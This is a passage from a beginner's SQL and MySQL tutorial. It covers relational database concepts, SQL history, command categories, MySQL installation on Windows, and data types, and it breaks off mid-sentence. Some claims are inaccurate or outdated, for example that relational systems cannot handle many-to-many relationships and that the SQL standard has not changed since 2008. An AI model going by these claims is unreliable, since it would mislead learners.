Introduction Anything that stores data records is called a database. It can be a file, CD, hard disk, or any number of storage solutions. From a programming point of view, a database is a methodically structured repository of indexed data information that can be easily accessed by the users for creating, retrieving, updating and deleting information. Data can be stored in many forms. Most applications require a database for storing information. A database can be of two types: (1) flat database and (2) relational database. As, the name suggests a flat database has a two dimensional structure that has data fields and records stored in one large table. It is not capable of storing complex information, which creates a need for relational databases. A relational database stores data in several tables that are related to each other. Let’s take the example of a school. A school will have to maintain data for several students. To find information for a student, we will first ask the class name. After the class name, we will ask for the first name. However, if there are two children with the same first name, then we will ask for the surname. If there are two children will identical names, we can still discriminate the information related to them based on their student id, parents name, date of birth, siblings in same school, etc. This is all related information. When all of this information is stored on paper, it takes a lot of time to retrieve it. Relational database allow easy access to all of this information. Let’s suppose Alex is not feeling well in school and the teacher wants to call his parents to come and pick him up. In the traditional way of maintaining information on paper, if the teacher loses the file with Alex’s mom’s number, she would not be able to contact her. However, if this information is stored in a database, she just needs to go to the administrator. The administrator will search for Alex’s home records and within a matter of seconds, the teacher will have the contact details. This will also free her from the burden of maintaining separate records for each child, allowing her to focus more time on other teaching related activities. A Brief History of SQL SQL is a programming language designed for Relational Database Management Systems (RDBMSs or just DBMSs). It is not a general-purpose programming language to be used to create stand-alone programs or web applications. It cannot be used outside of the DBMS world.

The origins of SQL are intertwined with the history of the origins and development of relational databases. It all started with an IBM researcher, Edgar Frank “Ted” Codd, who in June of 1970, published an article entitled “A Relational Model of Data for Large Shared Data Banks” in the journal Communications of the Association for Computing Machinery. In this paper, Codd outlined a mathematical theory of how data could be stored and manipulated using a tabular structure. This article established the foundational theories for relational databases and SQL. Codd’s article ignited several research and development efforts and this eventually led to commercial ventures. The company Relational Software, Inc. was formed in 1977 by a group of engineers in Menlo Park, California and in 1979 they shipped the first commercially available DBMS product, named Oracle. The company Relational would eventually be renamed Oracle. In 1980, several Berkeley University professors resigned and founded Relational Technology, Inc. and in 1981, they released their DBMS product named Ingres. In 1982, IBM finally started shipping its DBMS product, named SQL/Data System or SQL/DS. In 1983, IBM released Database 2 or DB2 for its mainframe systems. By 1985, Oracle proclaimed that they had over 1,000 Oracle installations. Ingres had a comparable number of sites and IBM’s DB2 and SQL/DS products were approaching 1,000. As these vendors were developing their DBMS products, they were also working on their products’ query language – SQL. IBM developed SQL at its San Jose Research Laboratory in the early 1970s and formally presented it in 1974 at a conference of the Association of Computing Machinery, ACM. The language was originally named “SEQUEL” for Structured English Query Language but it was later shortened to just SQL. It was Oracle Corporation, however (then known as Relational Software Inc.), who came out with the first implementation of SQL for its Oracle DBMS. IBM came out with its own version in 1981 for its SQL/DS DBMS. Because of the increasing popularity and proliferation of DBMSs and

consequently, SQL, the American National Standards Institute, ANSI, began working on a SQL standard in 1982. This standard, released in 1986 as X3.135, was largely based on IBM’s DB2 SQL. In 1987, the International Standards Organization, ISO, adopted the ANSI standard also as an ISO standard. Since 1986, ANSI has continued to work on the SQL standard and released major updates in 1989, 1992, and 1999. The 1999 standard added extensions to SQL to allow the creation of functions either in SQL itself or in another programming language. Since its official appearance, the 1999 standard has been updated three times: in 2003, in 2006, and in 2008. This last update is known as SQL:2008. There have been no updates since then. Current vendors exert admirable efforts to conform to the standard, but they still continue to extend their versions of the SQL language with additional features. The largest vendor, with a market share of 48% as of 2011, is Oracle Corporation. Its flagship DBMS, Oracle 11g, has dominated the UNIX market since the birth of the DBMS market. Oracle 11g is a secure, robust, scalable, high-performance database. However, Oracle 11g holds only second place in the transaction processing benchmark. Next, IBM’s DB2, holds the record in transaction speed. DB2’s current version is 9.7 LUW (Linux, UNIX and Windows). IBM holds 25% of the DBMS market. Third is Microsoft with an 18% share. Their product is SQL Server and the latest version is 2008 Release 2. Microsoft also has Microsoft Office Access, which is touted as a desktop relational database. Unlike the other DBMSs mentioned in this book, Access is a file-based database and as such has inherent limitations in performance and scalability. It also only supports a subset of the SQL Standard. The remaining 12% market share is staked out by Teradata, Sybase and other vendors including open source databases, one of which is MySQL. MySQL was initially developed as a lightweight, fast database in 1994. The developers, Michael Widenius and David Axmark, intended MySQL to be the backend of data-driven websites. It was fast, had many features, and it

was free. This explains its rise in popularity. In 2008, MySQL was acquired by Sun Microsystems, and Sun Microsystems was later purchased by Oracle. Oracle then offered a commercial version of MySQL in addition to the free version. The free version was named “community edition.” In programming, a relatively small addition or extension to a language that does not change the intrinsic nature of that language is called a dialect. There are five dominant SQL dialects: PL/SQL, which means Procedural Language/Structured Query Language. It is Oracle’s procedural extension for SQL and the Oracle DBMS. SQL/PL is IBM DB2’s procedural extension for SQL. Transact-SQL was initially developed jointly by Microsoft and Sybase Adaptive Server in the early 1990s, but since then the two companies have diverged and this has resulted in two distinct versions of Transact-SQL. PL/pgSQL means Procedural Language/postgreSQL, which is the name of the SQL extensions implemented in PostgreSQL. MySQL has introduced a procedural language into its database in version 5 but there is no official name for it. Now that Oracle owns MySQL, it is possible that Oracle might introduce PL/SQL as part of MySQL. The above SQL dialects implement the ANSI/ISO standard. Programmers should have few problems migrating from one dialect to another. It is also interesting to note the computer technology landscape during the period that relational databases and SQL began to emerge—the late 1970s to early 1980s. During that period, IBM dominated the computer industry with its mainframe computers, but was facing strong competition from minicomputer vendors Digital Equipment, Data General, and HewlettPackard, among others. Cobol, C, and Pascal were the predominant languages. Java was non-existent, and object-oriented programming had just emerged. Almost all software was proprietary with license fees in the tens or hundreds of thousands. The internet was just a couple of laboratories interconnected to share research papers. The World Wide Web was just a fantasy. Today, most of the dominant software and hardware of that era have gone the way of the dinosaur and much more powerful and innovative technologies have replaced them.

The only exception to this is the DBMS and its Structured Query Language, SQL, which continues to grow and dominate the computer world with no sign of becoming overshadowed or obsolete.

Chapter 1 Relational Database Concepts What is Data? Data can be defined as facts and statistics which are related to any object under consideration. For example, your name, height, weight age, etc. these are some specific data related to you. Also, an image, or a document or even a picture can also be considered data. What is a Database? Database can be said to be a place reserved to store and also process structured information. Database can also be said to be a systematic compilation/ collection of data. It is not a rigid platform, information stored in a Database can also be manipulated, modified or adjusted when the need arises. Database also supports the retrieval of stored information or data for further use. Database has many forms that store and organize information with the use of different structures. In a nutshell, data management becomes easy with databases. For instance, An online telephone directory would certainly use database for storage of data pertaining to phone numbers, people, as well as other contact details. Also, an electricity service provider will need a database to manage billing and other client related concerns. Database also helps to handle some discrepancies in data among other issues. Furthermore, the global and far-flung social media platform known as Facebook. Which has a lot of members and users connected across the world. Database is needed to store all the information of users, manipulate and also present data related to users of this platform and their online friends. Also, database helps to handle various of activities of users’ birthday, anniversary among others, as well as advertisements, messages, and lots more. In addition, most businesses depend absolutely on database for their daily operation. For complex multinationals database is needed to take inventory, prepare payroll for staff, process orders from clients, transportation, logistics, and shipping which often requires tracking of goods. All these operations are made easy because of a well-structured data base. It can go on and on providing innumerable examples of database usage.

What is a Database Management System (DBMS)? But how can you access the data in your database? This is the function of Database Management System (DBMS). DBMS can then be said to be a collection of programs which enables its users to gain access to the information on the database, manipulate data, as well as reporting or representation of data. Database Management System also helps to control and restrict access to the database. Database Management Systems was first implemented in 1960s and it cannot be said to be a new concept. From history, Charles Bachmen's Integrated Data Store (IDS) is the first ever Database Management Systems. After some time, technologies evolved speedily and before long wide usage and diverse functionalities of databases have been increased immeasurably. Types of DBMS There are four different types of DBMS which are; Hierarchical Network DBMS Object-Oriented DBMS Relational DBMS Hierarchical- which is rarely used nowadays and usually supports the "parent-child" relationship of storing data. Network DBMS - this type of DBMS employs many-to-many relationships. And this usually results in very complex database structures. An example of this DBMS is the RDM (Raima Database Manager) Server. Object-Oriented DBMS - new data types employ this DBMS. The data to be stored are always in form of objects. An example of this DBMS is the TORNADO. Relational DBMS (RDBMS) - This is a type of Database Management System that defines database relationships in form of tables, which is also known as relations. For instance, in a logistics company with a database that is designed for the purpose of recording fleet information, for effectiveness, you can include a table that has list of employees and another table which contains vehicles used by the employee. The two are held separately since

their information is different. Unlike other Database Management Systems such as Network DBMS, the RDBMS does not support many-to-many relationships. Relational Database Management System do not support all data types, they usually have already pre-defined data types which they can support. The Relational Database Management System is still the most popular DBMS type in the market today. Common examples of relational database management systems include Oracle, MySQL, as well as Microsoft SQL Server database. The Relational Model This model proposes that; 1. Data is organized and then stored in tables. 2. Databases are responsible for holding a collection of data stored in tables. Elements of a Relational Database Schema Some of these key elements include:

Tables Indexes Keys Constraints Views Popular Relational Database Management Systems There are some popular relational database management systems, and they will be discussed in this chapter.

1. MySQL This is the most popular open source SQL database which is usually used for development of web application. The main benefit of this is that it is reliable, inexpensive and also easy to use. It is therefore widely used by a broad community of developers over the years. The MySQL has been in used since 1995.

One of the disadvantages, however, is that it does not contain some recent features that most advanced developers would like to use for better performance. The outcome is also poor when scaling and the open source development has also lagged since MySQL has been taken over by Oracle.

2. PostgreSQL This is one of the open source SQL databases which is independent of any corporation. It is also used basically for development of web application. Some of the advantages of PostgreSQL over MySQL is that it is also easy to use, cheap and used by a wide community of developer. In addition, foreign key support is one of the special features of the PostgreSQL. And it does not require complex configuration. On the other hand, it is led popular that the MySQL and this makes it hard to access, it is also slower than the MySQL.

3. Oracle DB The code for Oracle Database is not open sourced. It is owned by Oracle Corporation. It is a Database employed by most multinational around the world especially top financial institutions such as banks. This is because it offers a powerful combination of comprehensive, technology, and preintegrated business applications. It also has some unique functions built in specifically for banks. Although it is not free to use by anyone, it can be very expensive to acquire.

4. SQL Server This is owned by Microsoft and it is not open sourced. It is mostly used by large enterprise and multinationals. Well, there is a free version for trial where you can test the features but for bogger features. Then, it becomes expensive to use. This test version is called Express.

5. SQLite This is a very popular open source SQL database. It has the ability to store an entire database just in one file. It has a major advantage of SQLite which is its ability to save or store data locally without necessarily using a server.

It is a popular choice for companies that use cellphones, MP3 players, PDAs, set-top boxes, and other electronic gadgets.

Chapter 2 SQL Basics The SQL (the Structured Query Language, Structured Query Language) is a special language used to define data, provide access to data and their processing. The SQL language refers to nonprocedural languages - it only describes the necessary components (for example, tables) and the desired results, without specifying how these results should be obtained. Each SQL implementation is an add-on on the database engine, which interprets SQL statements and determines the order of accessing the database structures for the correct and effective formation of the desired result. SQL to Work with Databases? To process the request, the database server translates SQL commands into internal procedures. Due to the fact that SQL hides the details of data processing, it is easy to use. You can use SQL to help out in the following ways: SQL helps when you want to create tables based on the data you have. SQL can store the data that you collect. SQL can look at your database and retrieves the information on there. SQL allows you to modify data. SQL can take some of the structures in your database and change them up. SQL allows you to combine data. SQL allows you to perform calculations. SQL allows data protection. Traditionally, many companies would choose to work with the ‘Database Management System,’ or the DBMS to help them to keep organized and to keep track of their customers and their products. This was the first option that was on the market for this kind of organization, and it does work well. But over the years there have been some newer methods that have changed the way that companies can sort and hold their information. Even when it comes

to the most basic management system for data that you can choose, you will see that there is a ton more power and security than you would have found in the past. Big companies will be responsible for holding onto a lot of data, and some of this data will include personal information about their customers like address, names, and credit card information. Because of the more complex sort of information that these businesses need to store, a new ‘Relational Database Management System’ has been created to help keep this information safe in a way that the DBMS has not been able to. Now, as a business owner, there are some different options that you can pick from when you want to get a good database management system. Most business owners like to go with SQL because it is one of the best options out there. The SQL language is easy to use, was designed to work well with businesses, and it will give you all the tools that you need to make sure that your information is safe. Let’s take some more time to look at this SQL and learn how to make it work for your business. How this works with your database If you decide that SQL is the language that you will work on for managing your database, you can take a look at the database. You will notice that when you look at this, you are basically just looking at groups of information. Some people will consider these to be organizational mechanisms that will be used to store information that you, as the user, can look at later on, and it can do this as effectively as possible. There are a ton of things that SQL can help you with when it comes to managing your database, and you will see some great results. There are times when you are working on a project with your company, and you may be working with some kind of database that is very similar to SQL, and you may not even realize that you are doing this. For example, one database that you commonly use is the phone book. This will contain a ton of information about people in your area including their name, what business they are in, their address, and their phone numbers. And all this information is found in one place so you won't have to search all over to find it. This is kind of how the SQL database works as well. It will do this by looking through the information that you have available through your company database. It will sort through that information so that you are better

able to find what you need the most without making a mess or wasting time. Relational databases First, we need to take a look at the relational databases. This database is the one that you will want to use when you want to work with databases that are aggregated into logical units or other types of tables, and then these tables have the ability to be interconnected inside of your database in a way that will make sense depending on what you are looking for at the time. These databases can also be good to use if you want to take in some complex information, and then get the program to break it down into some smaller pieces so that you can manage it a little bit better. The relational databases are good ones to work with because they allow you to grab on to all the information that you have stored for your business, and then manipulate it in a way that makes it easier to use. You can take that complex information and then break it up into a way that you and others are more likely to understand. While you might be confused by all the information and how to break it all up, the system would be able to go through this and sort it the way that you need in no time. You are also able to get some more security so that if you place personal information about the customer into that database, you can keep it away from others, in other words, it will be kept completely safe from people who would want to steal it. Client and server technology In the past, if you were working with a computer for your business, you were most likely using a mainframe computer. What this means is that the machines were able to hold onto a large system, and this system would be good at storing all the information that you need and for processing options. Now, these systems were able to work, and they got the job done for a very long time. If your company uses these and this is what you are most comfortable with using, it does get the work done. But there are some options on the market that will do a better job. These options can be found in the client-server system. These systems will use some different processes to help you to get the results that are needed. With this one, the main computer that you are using, which would be called the ‘server,’ will be accessible to any user who is on the network. Now, these users must have the right credentials to do this, which

helps to keep the system safe and secure. But if the user has the right information and is on your network, they can reach the information without a lot of trouble and barely any effort. The user can get the server from other servers or from their desktop computer, and the user will then be known as the ‘client’ so that the client and server are easily able to interact through this database. How to work with databases that are online There are a lot of business owners who will find that the client and server technology is the one that works for them. This system is great for many companies, but there are some things that you will need to add or take away at times because of how technology has been changing lately. There are some companies that like the idea that their database will do better with the internet so that they can work on this database anywhere they are located, whether they are at home or at the office. There are even times when a customer will have an account with the company, and they will need to be able to access the database online as well. For example, if you have an account with Amazon, you are a part of their database, and you can gain access to certain parts through this. As the trend continues for companies to move online, it is more common to see that databases are moving online as well and that you must have a website and a good web browser so that the customer can come in and check them out. You can always add in usernames and passwords to make it more secure and to ensure that only the right user can gain access to their information. This is a great idea to help protect personal and payment information of your customers. Most companies will require that their users pick out security credentials to get on the account, but they will offer the account for free. Of course, this is a system that is pretty easy to work with, but there will be a number of things going on behind the scenes to make sure that the program will work properly. The customer can simply go onto the system and check the information with ease, but there will be a lot of work for the server to do to make sure that the information is showing up on the screen in the right way, and to ensure that the user will have a good experience and actually see their own account information on the screen.

For example, you may be able to see that the web browser that you are using uses SQL or a program that is similar to it, to figure out the user that your data is hoping to see. Why is SQL so great? Now that we have spent some time talking about the various types of database management systems that you can work with, it is time to discuss why you would want to choose SQL over some of the other options that are out there. You not only have the option of working with other databases but also with other coding languages, and there are benefits to choosing each one. So, why would you want to work with SQL in particular? Some of the great benefits that you can get from using SQL as your database management system includes: Incredibly fast If you would like to pick out a management system that can sort through the information quickly and will get the results back in no time, then SQL is one of the best programs to use for this. Just give it a try, and you will be surprised at how much information you can get back, and how quickly it will come back to you. In fact, out of all the options, this is the most efficient one that you can go with. Well defined standards The database that comes with SQL is one that has been working well for a long time. In addition, it has been able to develop some good standards that ensure the database is strong and works the way that you want. Some of the other databases that you may want to work with will miss out on these standards, and this can be frustrating when you use them.

You do not need a lot of coding If you are looking into the SQL database, you do not need to be an expert in coding to get the work done. We will take a look at a few codes that can help, but even a beginner will get these down and do well when working in SQL. Keeps your stuff organized When it comes to running your business, it is important that you can keep

your information safe and secure as well as organized. And while there are a ton of great databases that you can go with, none will work as well as the SQL language at getting this all done. Object-oriented DBMS The database of SQL relies on the DBMS system that we talked about earlier because this will make it easier to find the information that you are searching for, to store the right items, and do so much more within the database. These are just a few of the benefits that you can get when you choose to work with the SQL program. While some people do struggle with this interface in the beginning, but overall there are a ton of good features to work on with SQL, and you will really enjoy how fast and easy it is to work with this language and its database. You may believe that SQL is an incomplete programming language. If you want to use SQL in an application, you must combine SQL with another procedural language like FORTRAN, Pascal, C, Visual Basic, C++, COBOL, or Java. SQL has some strengths and weaknesses because of how the language is structured. A procedural language that is structured differently will have different strengths and weaknesses. When you combine the two languages, you can overcome the weaknesses of both SQL and the procedural language. You can build a powerful application when you combine SQL and a procedural language. This application will have a wide range of capabilities. We use an asterisk to indicate that we want to include all the columns in the table. If this table has many columns, you can save a lot of time by typing an asterisk. Do not use an asterisk when you are writing a program in a procedural language. Once you have written the application, you may want to add or delete a column from the table when it is no longer necessary. When you do this, you change the meaning of the asterisk. If you use the asterisk in the application, it may retrieve columns which it thinks it is getting. This change will not affect the existing program until you need to recompile it to make some change or fix a bug. The effect of the asterisk wildcard will then expand to current columns. The application could stop working if it cannot identify the bug during the debugging process. Therefore, when you build an application, refer to the column names explicitly in the application and avoid using the asterisk.

Since the replacement of paper files stored in a physical file cabinet, relational databases have given way to new ground. Relational database management systems, or RDBMS for short, are used anywhere information is stored or retrieved, like a login account for a website or articles on a blog. Speaking of which, this also gave a new platform to and helped leverage websites like Wikipedia, Facebook, Amazon, and eBay. Wikipedia, for instance, contains articles, links, and images, all of which are stored in a database behind-the-scene. Facebook holds much of the same type of information, and Amazon holds product information and payment methods, and even handles payment transactions. With that in mind, banks also use databases for payment transactions and to manage the funds within someone’s bank account. Other industries, like retail, use databases to store product information, inventory, sales transactions, price, and so much more. Medical offices use databases to store patient information, prescription medication, appointments, and other information. To expand further, using the medical office for instance, a database gives permission for numerous users to connect to it at once and interact with its information. Since it uses a network to manage connections, virtually anyone with access to the database can access it from just about anywhere in the world. These types of databases have also given way to new jobs and have even expanded the tasks and responsibilities of current jobs. Those who are in finance, for instance, now have the ability to run reports on financial data; those in sales can run reports for sales forecasts, and so much more! In practical situations, databases are often used by multiple users at the same time. A database that can support many users at once has a high level of concurrency. In some situations, concurrency can lead to loss of data or the reading of non-existent data. SQL manages these situations by using transactions to control atomicity, consistency, isolation, and durability. These elements comprise the properties of transactions. A transaction is a sequence of T-SQL statements that combine logically and complete an operation that would otherwise introduce inconsistency to a database. Atomicity is a property that acts as a container for transaction statements. If the statement is successful, then the total transaction completes. If any part of a transaction is unable to process fully, then the entire operation fails, and all partial changes

roll back to a prior state. Transactions take place once a row, or a page-wide lock is in place. Locking prevents modification of data from other users taking effect on the locked object. It is akin to reserving a spot within the database to make changes. If another user attempts to change data under lock, their process will fail, and an alert communicates that the object in question is barred and unavailable for modification. Transforming data using transactions allows a database to move from one consistent state to a new consistent state. It's critical to understand that transactions can modify more than one database at a time. Changing data in a primary key or foreign key field without simultaneously updating the other location, creates inconsistent data that SQL does not accept. Transactions are a big part of changing related data from multiple table sources all at once. Transactional transformation reinforces isolation, a property that prevents concurrent transactions from interfering with each other. If two simultaneous transactions take place at the same time, only one of them will be successful. Transactions are invisible until they are complete. Whichever transaction completes first will be accepted. The new information displays upon completion of the failed transaction, and at that point, the user must decide if the updated information still requires modification. If there happened to be a power outage and the stability of the system fails, data durability would ensure that the effects of incomplete transactions rollback. If one transaction completes and another concurrent transaction fails to finish, the completed transaction is retained. Rollbacks are accomplished by the database engine using the transaction log to identify the previous state of data and match the data to an earlier point in time. There are a few variations of a database lock, and various properties of locks as well. Lock properties include mode, granularity, and duration. The easiest to define is duration, which specifies a time interval where the lock is applied. Lock modes define different types of locking, and these modes are determined based on the type of resource being locked. A shared lock allows the data reads while the row or page lock is in effect. Exclusive locks are for performing data manipulation (DML), and they provide exclusive use of a row or page for the execution of data modification. Exclusive locks do not take place concurrently, as data is being actively modified; the page is then inaccessible to all other users regardless of permissions. Update locks are placed on a single object and allow for the data reads while the update lock is in place. They also allow the database engine to determine if an exclusive

lock is necessary once a transaction that modifies an object is committed. This is only true if no other locks are active on the object in question at the time of the update lock. The update lock is the best of both worlds, allowing reading of data and DML transactions to take place at the same time until the actual update is committed to the row or table. These lock types describe page-level locking, but there are other types beyond the scope of this text. The final property of a lock, the granularity, specifies to what degree a resource is unavailable. Rows are the smallest object available for locking, leaving the rest of the database available for manipulations. Pages, indexes, tables, extents, or the entire database are candidates for locking. An extent is a physical allocation of data, and the database engine will employ this lock if a table or index grows and more disk space is needed. Problems can arise from locks, such as lock escalation or deadlock, and we highly encourage readers to pursue a deeper understanding of how these function. It is useful to mention that Oracle developed an extension for SQL that allows for procedural instruction using SQL syntax. This is called PL/SQL, SQL on its own is unable to provide procedural instruction because it is a non-procedural language. The extension changes this and expands the capabilities of SQL. PL/SQL code is used to create and modify advanced SQL concepts such as functions, stored procedures, and triggers. Triggers allow SQL to perform specific operations when conditional instructions are defined. They are an advanced functionality of SQL, and often work in conjunction with logging or alerts to notify principals or administrators when errors occur. SQL lacks control structures, the for looping, branching, and decision making, which are available in programming languages such as Java. The Oracle corporation developed PL/SQL to meet the needs of their database product, which includes similar functionality to other database management systems, but is not limited to non-procedural operations. Previously, user-defined functions were mentioned but not defined. T-SQL does not adequately cover the creation of user-defined functions, but using programming, it is possible to create functions that fit neatly within the same scope as system-defined functions. A user-defined function (UDF) is a programming construct that accepts parameters, performs tasks capable of making use of system defined parameters, and returns results successfully. UDFs are tricky because Microsoft SQL allows for stored procedures that often can accomplish the same task as a user-defined function. Stored procedures are a batch of SQL statements that are executed

in multiple ways and contain centralized data access logic. Both of these features are important when working with SQL in production environments.

Chapter 3 Some of the Basic Commands We Need to Know

Now, before we are able to get too far into some of the codings that we are able to do with this kind of language, one of the first things that we need to learn a bit more about is some of the basic commands that come with this language, and how each of them is going to work. You will find that when you know some of the commands that come with any language, but especially with the SQL language, it will ensure that everything within the database is going to work the way that you would like. As we go through this, you will find that the commands in SQL, just like the commands in any other language, are going to vary. Some are going to be easier to work with and some are going to be more of a challenge. But all of them are going to come into use when you would like to create some of your own queries and more in this language as well so it is worth our time to learn how this works. When it comes to learning some of the basic commands that are available in SQL, you will be able to divide them into six categories and these are all going to be based on what you will be able to use them for within the system. Below are the six different categories of commands that you can use inside of SQL and they include the following. Data Definition Language

The data definition language, or DDL, is an aspect inside of SQL that will allow you to generate objects in the database before arranging them the way that you would like. For example, you will be able to use this aspect of the system in order to add or delete objects in the database table. Some of the commands that you will be able to use with the DDL category include: Drop table Create a table Alter table Create an index Alter index Drop index Drop view Data Manipulation Language The idea of a DML, or data manipulation language, is one of the aspects of SQL that you will be able to use to help modify a bit of the information that is out there about objects that are inside of your database. This is going to make it so much easier to delete the objects, update the objects, or even to allow for something new to be inserted inside of the database that you are working with. You will find that this is one of the best ways to make sure that you add in some freedom to the work that you are doing, and will ensure that you are able to change up the information that is already there rather than adding to something new. Data Query Language Along with the same kinds of lines and thoughts here are the DQL or the data query language. This one is going to be kind of fun to work with because it is going to be one of the most powerful of the aspects that you are able to do with the SQL language you have. This is going to be even truer when you work with a modern database to help you get the work done. When we work with this one, we will find that there is only really one command that we are able to choose from, and this is going to be the SELECT command. You are able to use this command to make sure that all of your queries are ran in the right way within your relational database. But if

you want to ensure that you are getting results that are more detailed, it is possible to go through and add in some options or a special clause along with the SELECT command to make this easier. Data Control Language The DCL or the data control language is going to be a command that you are able to use when you would like to ensure you are maintaining some of the control that you need over the database, and when you would like to limit who is allowed to access that particular database, or parts of the database, at a given time. You will also find that the DCL idea is going to be used in a few situations to help generate the objects of the database related to who is going to have the necessary access to see the information that is found on that database. This could include those who will have the right to distribute the necessary privileges of access when it comes to this data. This can be a good thing in order to use your business is dealing with a lot of sensitive information and you only want a few people to get ahold of it all the time. Some of the different commands that you may find useful to use when working with the DCL commands are going to include: Revoke Create synonym Alter password Grand Data Administration Commands When you choose to work with these commands, you will be able to analyze and also audit the operation that is in the database. In some instances, you will be able to assess the overall performance with the help of these commands. This is what makes these good commands to choose when you want to fix some of the bugs that are on the system and you want to get rid of them so that the database will continue to work properly. Some of the most common commands that are used for this type include: Start audit Stop audit

One thing to keep in mind with the database administration and the data administration are basically different things when you are on SQL. The database administration is going to be in charge of managing all of the databases, including the commands that you set out in SQL. This one is also a bit more specific to implementing SQL as well.

Transactional Control Commands The final type of command that we are going to take a look at is going to be the transactional control commands. These are going to be some good commands that you are able to work within SQL if you would like to have the ability to keep track of as well as manage some of the different transactions that are going to show up in the database that you are working with. If you sell some products online for your website, for example, you will need to work with the transactional control commands to help keep track of the different options that the user is going to look for, to keep track of the profits, and to help you to manage this kind of website so that you know what is going on with it all of the time. there are a few options that you are able to work with when it comes to these transactional control commands, and a few of the most important ones that we need to spend our time on will include: Commit—this one is going to save all the information that you have about the transactions inside the database. Savepoint—this is going to generate different points inside the groups of transactions. You should use this along with the Rollback command. Rollback—this is the command that you will use if you want to go through the database and undo one or more of the transactions. Set transaction—this is the command that will assign names to the transactions in your database. You can use it to help add in some organization to your database system. All of the commands that we have spent some time discussing in this chapter

are going to be important to some of the work that we want to get done and will ensure that we are going to find the specific results that we need out of our database. We will be able to spend some time looking through them in this book, but this can be a good introduction to show us what they mean, and how we will be able to use them for some of our needs later on.

Chapter 4 Installing and configuring MySql on your system If you already have MySql server installed on your server then you can skip this section. Here, I am going to provide you the steps required to install MySQL 8.0 on Windows computer. Here is the link to the software https://dev.mysql.com/downloads/mysql/8.0.html. If you are not using Windows then under the heading “MySQL Community Server 8.0.18” you will see the “Select Operating System:” dropbox. Select your Operating system and you will be provided with all the options. If you are learning on a standalone system and you are a beginner, I would recommend you to install Windows Essentials from https://mysqlessential.en.uptodown.com/windows. While looking for information on MySql you will come across terms like MySQl community server, MySql installer and MySql essentials. As the name suggests Essentials provides just what is essential without any additional components and ideal to start learning. Both installer and community server have full server features, but the community server is only installed online. For the installer, you have to download the package and then install it offline. Back to MySql Essential. Once you click the download button, the installer package can be found in the downloads folder by the name of “mysqlessential-6.0.0.msi”. Follow the steps given below for installing the software. 1. Double click on the mysql-essential-6.0.0.msi package to start the installation process. You would see a MySQL Server 6.0 – Setup Wizard Window. To continue with the installation process click on “Next button”. 2. You will now have to select the Setup Type. Setup can be one of three types: 1. Typical for general use 2. Complete for installation of all program features 3. Custom to select which programs you want to install. You can go ahead with Typical installation. If you want to change the path

where the software is installed then you will have to opt for custom installation. 3.

For this book, I went with custom installation because I wanted to change the path of installation. Click Next.

4. The next screen will prompt you to login or create a MySQL account. Signing up is not mandatory. You can create an account or click on the “Skip Sign-Up” radio button and click the Next button. 5. You have reached the last screen of the installation process. Before pressing the Finish button ensure that the “Configure the MySQL Server now” check box is clicked. We now move on to configuration of MySQL. After clicking the “Finish” button, you will be presented with “MySQL Server Instance Configuration Wizard”. If the window does not pop up on its own, click the Start button on the desktop. Look for the Wizard and click on it. Click “Next” on the first screen. Now follow the steps given below: 1. You must first select whether you want to go for detailed or standard configuration. Select “Detailed Configuration”. 2. Next, you have to select the server type. Your selection will influence memory, disk and CPU usage. Go for Server if you are planning to work on a server that is hosting other applications. Click Next. 3. If you have selected Server in the above step, you will be presented a screen where you are asked to set a path for InnoDBdatafile to enable InnoDB database engine. Without making any modifications click on Next. 4. On this screen, you will have to set approximate number of concurrent connections directed to the server. Ideally, for general purpose usage, it is best to go with the first option. Click Next after making your selection. 5. On the next screen, you are presented with two options: (1) Set the TCP/IP Networking to enabled and (2) Enable Strict Mode. Check the “Enable TCP/IP Networking” option. The second

option “Enable Strict Mode” will be checked by default. Most applications do not prefer this option, so if you do not have a good reason for using it in Strict mode, uncheck this option and click the Next button. 6. You will now be asked to set the default character set used by MySQL. Select “Standard Character Set” and click on Next. 7. On this step, you must set window options. You will see three check boxes : “Install as Windows Service”, “Launch the MySQL Server automatically” and “Include Bin Directory in Windows PATH” . Check all three boxes and click Next. 8. You will now have to set the root password for the account. Check “Modify Security Settings” and provide your password details. If your server is on the internet then avoid checking “Enable root access from remote machines”. Also, it is not recommended to check the “Create An Anonymous Account” option. Please save the password at a safe place. 9. This window will show you how the configuration is processing. Once the processing is over, the “Finish” button will be enabled and you can click on it. Congratulations!! You have successfully installed and configured MySQL on your machine. It is time for action now.

Chapter 5 Data Types There are various types of data that can be stored in databases. Listed below are some of the data types that can be found and used in a database: • Byte- allows numbers from the range of 0-255 to be contained. Storage is 1 byte. • Currency- this holds 15 whole dollar digits with additional decimal places up to 4. Storage is 8 bytes. • Date/Time- will be used for dates and times. Storage is 8 bytes. • Double- This is a double precision floating-point which will handle most decimals. Storage is 8 bytes. • Integer- This will allow of the amounts between -32,768 and 32,767. Storage is 2 bytes. • Text- This is used for combinations of texts and numbers. This can up to 255 characters to be stored. • Memo- This can be used for text of larger amounts. It can store 65,536 characters. Memo fields can’t be sorted but they can be searched. • Long- This will allow between -2,147,483, 648 and 2,147,483,647 whole numbers. Storage is 4 bytes. • Single- This is a single precision floating-point that will handle most decimals. Storage is 4 bytes. • AutoNumber- This field can automatically give each record of data its own number which usually starts out at 1. Storage is 4 bytes. • Yes/No- This is a logical field that can be displayed as yes/no, true/false, or on/off. The use of true and false should be equivalent to -1 and 0. In these fields, null values are not allowed. Storage is 1 bit. • Ole Object- This can store BLOBS such as pictures, audio, video. BLOBs are which Binary Large Objects. The storage is 1 gigabyte (GB). • Hyperlink- This contains links to other files like web pages. • Lookup Wizard- This will let you make an options list. A drop down list will then allow it to be chosen. Storage is 4 bytes. Overall, data types can be categorized into three different types of data. They are either

